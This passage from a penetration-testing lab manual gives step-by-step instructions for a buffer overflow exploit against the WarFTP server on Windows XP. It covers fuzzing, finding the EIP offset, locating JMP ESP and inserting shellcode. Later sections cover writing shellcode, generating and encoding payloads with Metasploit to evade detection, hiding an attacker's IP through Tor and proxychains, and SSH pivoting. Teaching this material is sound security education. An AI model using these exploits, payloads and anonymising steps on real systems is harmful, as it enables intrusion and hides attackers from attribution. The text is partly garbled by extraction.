iii. You can connect with telnet or nc command to the ftp server
# nc<target.ip> 21
After connecting, you can type ―USER‖ command to give the username and ―PASS‖
command to provide with password.
Here I have entered more than 20 ‗!‘ characters but it was not enough to crash the system lets try
with more characters.
The above step maybe repeated until you crash the system or observe in debugger the EIP being
overwritten.
St. Angelo‘s Professional Education Lab Manual v1.0
90
For this we can use a simple FTP login script to easily login into the ftp server.
Write and save the above code as <Somename>.pl and execute it
#perl<Somename>.pl
Now next step it to generate large string for the input USER and PASS, lets use Perl to generate it
for us.
# perl –e ‗print ―A‖ x 1000‘
Now copy all ‗A‘ and paste it in place of username and password in the above script.
Run the script and see if the application crashes.
If the program is not responding or closed automatically, it means it crashed!
If you have not attached the debugger already, do it now, and repeat the above step of executing
the Perl script with long string of A‘s.
use strict; use Net::FTP; my $host = "server.IP"; my $user = "user"; my $password = "password"; my $f = Net::FTP->new($host) or die "Can't open $host\n"; $f->login($user, $password) or die "Can't log $user in\n";
St. Angelo‘s Professional Education Lab Manual v1.0
91
Attaching the debugger:
Using Ollydbg
Ollydbg is one of the best RING 3 debuggers for windows applications and is the one used in
this demonstration.
To attach a process click File->Attach-> select the <Process name> and click on attach to attach
the process.
Once the process is attached, run our perl script again and observe ollydbgshowup the program crash.
The program crashes again, and the debugger shows a message saying ―Access violation while
executing 41414141‖. What it means is that we have tried to go to address 41414141 for executing
code, since this not a valid address, the system cannot proceed and all the execution halts.
St. Angelo‘s Professional Education Lab Manual v1.0
92
Observe what all registers are overwritten.
Observe on the right Upper block of ollydbg which shows register values of CPU.
The values of ESP, EBP, EDI and EIP are showing 41414141 which is nothing but our character ‗A‘
shown as ascii value.
This is our proof of concept that the value of EIP can now be overwritten, which gives us control to
jump into other memory places.
If we can plant a Shellcode somewhere in the memory then we can use this EIP to point it the starting
address of our Shellcode.
Writing the exploit:
To write the exploit we need to know some details in accurate
Let’s see what we already know,
We already know that the program crashes when we send 1000 A‘s.
The EIP is successfully overwritten with A‘s.
What we need to know:
• We need to know exactly at which byte the EIP is being overwritten.(Without knowing
it, we can‘t write our exploit as we will not know where to place the address of our
Shellcode in the exploit.)
• We need to know exactly how many bytes we have after EIP , that ESP points to. (This
is required as our Shellcode will start from address where our ESP points to and our
Shellcode cannot exceed this size.)
Finding the exact Byte:
To find the exact byte, we can use a trial and error methods by decreasing the boundaries of our
variables, i.e instead of 1000 A‘s we try to send 500 ‗A‘ and 500 ‗B‘
In the next case, we would decrease it by sending 400 ‗A‘ and 400 ‗B‘ and so on.
St. Angelo‘s Professional Education Lab Manual v1.0
93
The other easier method we can use is to generate a unique string, send it across, observe it in ollydbg
and find the exact byte at which the 4 characters of EIP are present in the unique string.
In this case we have program in backtrack to generate and locate the exact byte num.
This tools is a part of metasploit tools and is available in /opt/metasploit/msf3/tools/
Use #pattern_create.rb to generate unique string.
Pattern_create.rb usage:
#./pattern_create.rb 1000 (will create 1000 unique characters)
#./pattern_create.rb 1000 A B C (Creates 1000 characters of ―ABC‖)
Replace the 1000 A‘s with the newly generated unique string in the perl script for ftp login.
Before executing the program remember to restart the program back in windows XP.
Once the script is executed and the program crashes, observer the values of EIP in ollydbg.
The value here is ―32714131‖, to find the exact byte we use the program. pattern_offset.rb
which is in the same folder as pattern_create.rb.
o pattern_offset usage:
#./pattern_offset ―unique value‖
St. Angelo‘s Professional Education Lab Manual v1.0
94
So, the exact offset where EIP gets overwritten is ―485‖
Finding the Buffer space:
We have now found the exact byte at which EIP is overwritten, The next step is to find the
amount of buffer space available in the stack for executing our Shellcode.
In the ollydbg look for the unique string at ESP(this points to where the stack resides or our
Shellcode will be residing.)
The marked letters(q4Aq5Aq6) are the 4 bytes for
which we need to find the offset for to know the exact byte where stack originates.
We use the same patter_offset to find this offset too.
Let‘s check if from 493 bytes, the buffer really starts
To check lets modify our perl script.
#perl –e ‗print ―A‖ x 485. ―BBBB‖. ―C‖ x 4 . ―STAR‖ . ―D‖ x 100 ‘
This will generate string that identifies exact bytes of EIP and ESP
Copy the generated string and place it variables username and password in our perl script and
execute it after restarting the program in windows Xp
St. Angelo‘s Professional Education Lab Manual v1.0
95
This shows that indeed EIP is at 485 bytes since it is written by 42(Ascii character B) and ESP is
written by by ―STAR‖ which starts at 493.
Look at the stack dump and calculate the number of bytes that is overwritten by the letter ―D‖
represented in ASCII character ‗42‘ until it hits the SEH record.
That gives us 72 bytes of free space in the stack where our Shellcode can go.
Finding JMP ESP instruction.
The need to find JMP ESP instruction is that we cannot hardcode the address and tell our
code to directly jump to our Shellcode, since we can be sure of where ESP starts from we can
overwrite the EIP with an address where JMP ESP instruction is located and once executed it jumps
directly to our stack or where our Shellcode resides and starts executing it.
There are various tools to find the JMP ESP instruction in a library.
We will use ollydbg to find the instruction.
Let‘s look at libraries used by warftp program in ollydbg. (Click on the icon to show the list of
libraries used by the program. )
St. Angelo‘s Professional Education Lab Manual v1.0
96
In any exploit you write, try to find JMP or other instructions you need in a library that you are
sure to be included in the program while executing. i.e some programs may have program
independent libraries that may not load all the time.
Here we choose to find the instruction from SHELL32.dll since it is always included for a program
that needs to be executed.
Click on the shell32.dll and look for the instruction JMP ESP. (To find an instruction use Ctrl + F
which opens the find box, enter the instruction you want to find and click on find.)
We have found the JMP ESP instruction at ―7C9D30D7‖
This is the address we want to place it in EIP.
Now, we have got all that we need, the next is to find a Shellcode that we can place it in our stack.
For the Shellcode, we will search exploit-db to get it. You can write your Shellcode and put it in, or
search other websites of your interest to get the Shellcode.
In this example since we have limit of 72 bytes, we will look for a Shellcode that is less than 72
bytes.
St. Angelo‘s Professional Education Lab Manual v1.0
97
Exploit gave us some results on ―Windows XP‖,
We can see that there are different Shellcode with different sizes, we will choose the windows XP
SP3 cmd.exe (26 bytes) since this machine is SP3 and we have not more that 72 bytes.
This is the cmd.exe Shellcode that when run a calculator program in our warftpd.
We will modify our perl ftp login script to fit our JMP ESP and our Shellcode.
Execute the perl script and see the windows command prompt open up.
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x2F\x68\x63\x6d\x64\x2e".
"\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0"
St. Angelo‘s Professional Education Lab Manual v1.0
98
Writing Shellcode:
Objectives: At the end of this module you should be able
Understand Shellcode creation
Create a simple Shellcode
Understand opcodes and hex conversions of binary file.
Description: The code when executed in a machine pawns a shell giving access to possibly
a remote user/attacker.
It is a single continuous string of characters that can be sent as a payload to an exploit for
attacking a machine.
In this demo we will be using a simple sleep function Shellcode which sleeps for given time and
exits.
For this to execute, we have to first find the address of ―sleep‖ function in one of the windows
libraries.
We have an excellent program called dllexportviewer.exe to find any functions address
St. Angelo‘s Professional Education Lab Manual v1.0
99
Writing the Shellcode:
Steps:
Compile the given assembly code
#nasm -f bin -o sleep.bin sleep.asm
Obtaining the opcodes using xxd tool
# xxd -isleep.bin
0x31, 0xc0, 0xbb, 0x42, 0x24, 0x80, 0x7c, 0x66, 0xb8, 0x88, 0x13, 0x50,
0xff, 0xd3
Format it according to the following output by using xxd-shellcode.sh
[SECTION .text]
BITS 32 global _start _start:
xoreax,eax movebx, 0x7c802442
mov ax, 5000
pusheax
St. Angelo‘s Professional Education Lab Manual v1.0
100
# ./xxd-shellcode.sh sleep.bin
\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3
Testing the Shellcode
Compile the generated Shellcode, using the beside program as a template.
Compile the program.
# gcc -o shellcodetestshellcodetest.c
Test the shellcode.
# ./shellcodetest.exe
(sleeps for 5 seconds) (then exits - and may core dump)
The Shellcode string generated should not contain null bytes as it will terminate the program
abruptly.
Avoiding Null Bytes:
Use XOR opcode to nullify variables when needed.
Use AL,BL,CL,DL registers when 32 bits are not needed.
/* shellcodetest.c Shellcode template*/
char code[] = “\x31\xc0\xbb\x42\x24\x80\x7c\x66\xb8\x88\x13\x50\xff\xd3” ;
int main(intargc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); }
St. Angelo‘s Professional Education Lab Manual v1.0
101
Metasploit:
The Metasploit Framework is a development platform for creating security tools and exploits.
Developed by HD Moore <[email protected]>
The framework is written in the Ruby programming language.
Components of Metasploit:
Exploits
◦ Defined as modules that use payloads.
Payloads
◦ Payloads consist of code that runs remotely.
Auxiliaries
◦ Exploits without payloads are called auxiliaries.
Encoders
◦ Encoders ensure that payloads make it to their destination
Nops
◦ Nops keep the payload sizes consistent.
Metasploit User interfaces.
Armitage:
• Armitage is a graphical cyber attack management tool for Metasploit that visualizes
your targets, recommends exploits, and exposes the advanced capabilities of the
framework.
• For those who are not comfortable with using command-line interface.
• Valuable for managing remote Metasploit instances and collaboration
St. Angelo‘s Professional Education Lab Manual v1.0
102
Other Interfaces.
Msfweb:
◦ Launches a http server and makes available the framework that can be controlled by a
web application.
Msfcli:
◦ Command-line interface which looks like command prompt.
◦ For those who like CMD.exe
MsfConsole:
◦ Console which looks more like bash shell.
◦ Has a neat formatting.
◦ Easy to use.
◦ Will be learning Metasploit in MSFCONSOLE.
Launching the MsfConsole.
◦ Windows: Start->All Programs->Metasploit->msfconsole.
◦ Backtrack: Open your favorite shell and type msfconsole.
Booting up the framework.
Start with msfconsole –h which shows all the commands that can be used in in this
console.
A Console Cheat Sheet
Use <module> -start configuring module
Show <options> -show configurable options
Set <varname><value> -set an option
Exploit -launch exploit module
Run -launch non-exploit module(auxilary)
Sessions -i <n> -interact with a ―n‖ session.
Help<command> -get help for a command.
Msfencode and msfpayload are the two features of Metasploit which offer writing of custom
exploits.
Msfpayload generates the necessary code for the exploit, while
Msfencode encodes it to keep undetectable from protections.
msfencode –h : Display the help file of msfencode
msfencode –l : Lists the available encoders
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho):
Format to display the encoded buffer
msfencode -ipayload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe:
Uses the shikata_ga_nai encoder to encode the payload.raw 5 times and exports it to a file
called encoded_payload.exe
Using Metasploit payload generators:
msfpayload is a command-line instance of Metasploit that is used to generate and output
all of the various types of shellcode that are available in Metasploit. The most common
use of this tool is for the generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and options before
finalizing a module.
St. Angelo‘s Professional Education Lab Manual v1.0
103
This tool has many different options and variables available to it, but they may not all be
fully realized given the limited output in the help banner.
These tools can be used to generate Shellcode for any of the following programs.
The list can be further update or synced with exploit-db.
Once you have selected a payload, there are two switches that are used most often when
crafting the payload for the exploit you are creating.
In the example below we have selected a simple Windows bind shell. When we add the
command-line argument "O" with that payload, we get all of the available configurable
options for that payload.
St. Angelo‘s Professional Education Lab Manual v1.0
104
• As we can see from the output, we can configure three different options with this specific
payload, if they are required, if they come with any default settings, and a short
description:
EXITFUNC
◦ Required
◦ Default setting: process
LPORT
◦ Required
◦ Default setting: 4444
RHOST
◦ Not required
◦ No default setting
Setting these options in msfpayload is very simple. An example is shown below of
changing the exit technique and listening port of the shell:
St. Angelo‘s Professional Education Lab Manual v1.0
105
Now that all of that is configured, the only option left is to specify the output type such as
C, Perl, Raw, etc.
For this example we are going to output our Shellcode to perl:
Exercises:
o Generate Shellcode for VNC inject using msfpayload.
o Write a simple program in C which uses the above generated Shellcode as payload.
St. Angelo‘s Professional Education Lab Manual v1.0
106
St. Angelo‘s Professional Education Lab Manual v1.0
107
Proxies and Tunneling Techniques
Objectives: At the end of this module you should be able
Hide your IP address in an attack. Tunnel through SSH and HTTP protocols.
Proxies
Description: Proxy is an intermediate software/device which forwards packets from one system to another hiding the true identity of the user.
Since the end system can only see the packet coming from previous system, it would be difficult to trace out directly where the original packet originated.
Types of Proxies:
Tunneling Proxy: A proxy server that passes requests and responses unmodified is usually called a gateway or sometimes tunneling proxy.
Forward Proxy:A forward proxy is an Internet-facing proxy used to retrieve from a wide range of sources (in most cases anywhere on the Internet).
Reverse Proxy: A reverse proxy is (usually) an Internet-facing proxy used as a front-end to control and protect access to a server on a private network, commonly also performing tasks such as load-balancing, authentication, decryption or caching.
Protocols Supported:
HTTP
SSL
FTP
SOCKS
TOR:
Tor is onion router which routes packets across many systems before reaching the end system. These layers or systems form layers like the ones you see on onion, so the name onion router. These systems are mostly users of internet acting like intermediate systems.
To work with tor, there are binary packages available for browsers like vadalia. However the preferred way is to install the tor is as a service which opens a port on 9050 to
which any software can be connected to.
St. Angelo‘s Professional Education Lab Manual v1.0
108
Instructions for installing and usage:
To install tor as a service under linux (Debianflavours) Backtrack does not have the service tor installed and is also not available from the
repositories With a little configuration we can add tor service very easily. Open /etc/apt/sources.list and append the line
deb http://deb.torproject.org/torproject.org lucid main Hit apt-get update in the command line
root@bt:~# apt-get update root@bt:~# apt-get install tor Start the service by command ‘service’ root@bt:~# service tor start Confirm the tor service status by using netstat command
To stop tor root@bt:~# service tor stop Also install proxychains which is a proxy tool that ensure the packets are routed through
many systems before reaching the target system root@bt:~# apt-get installproxychains proxychains usage:
St. Angelo‘s Professional Education Lab Manual v1.0
109
Example:
System IP before proxy chains
Ip address after using proxy chains:
St. Angelo‘s Professional Education Lab Manual v1.0
110
Pivoting (SSH tunneling)
Description: Pivoting is a concept of tunneling into machines where the user may not have a direct access to other systems in a network.
For example, the attacker (IP: 117.139.142.191) has attacked a system (IP:
49.230.123.123)say a web server, which is further connected to a local network with the IP range 10.42.43.1 – 10.42.43.100 where local services or possibly load balancers may be running.
The attacker cannot access the machines in the local network due to firewall
configurations. However since the attacker has successfully attacked the web server having public access, he may be able to access other machines through the web server (IP: 49.230.123.123).
Instructions for SSH pivoting:
Since we have SSH access to the web server, we can use SSH port forwarding to use it as our pivot. We run the following command on our attacking machine:
This will establish a connection from our local system (127.0.0.1) from the port 4444 to
10.42.43.1at port 4444 through the webserver (IP:49.230.123.123)
Exercises:
1. By using tor and proxychains, scan a system with NMAP and test if indeed the attacker’s machine is hidden.
2. Configure the native browser to connect to o SOCKS proxy (TOR or online proxies) o HTTP proxies
Document the findings and configuration steps.
ssh -L 127.0.0.1:4444:10.42.43.1:[email protected]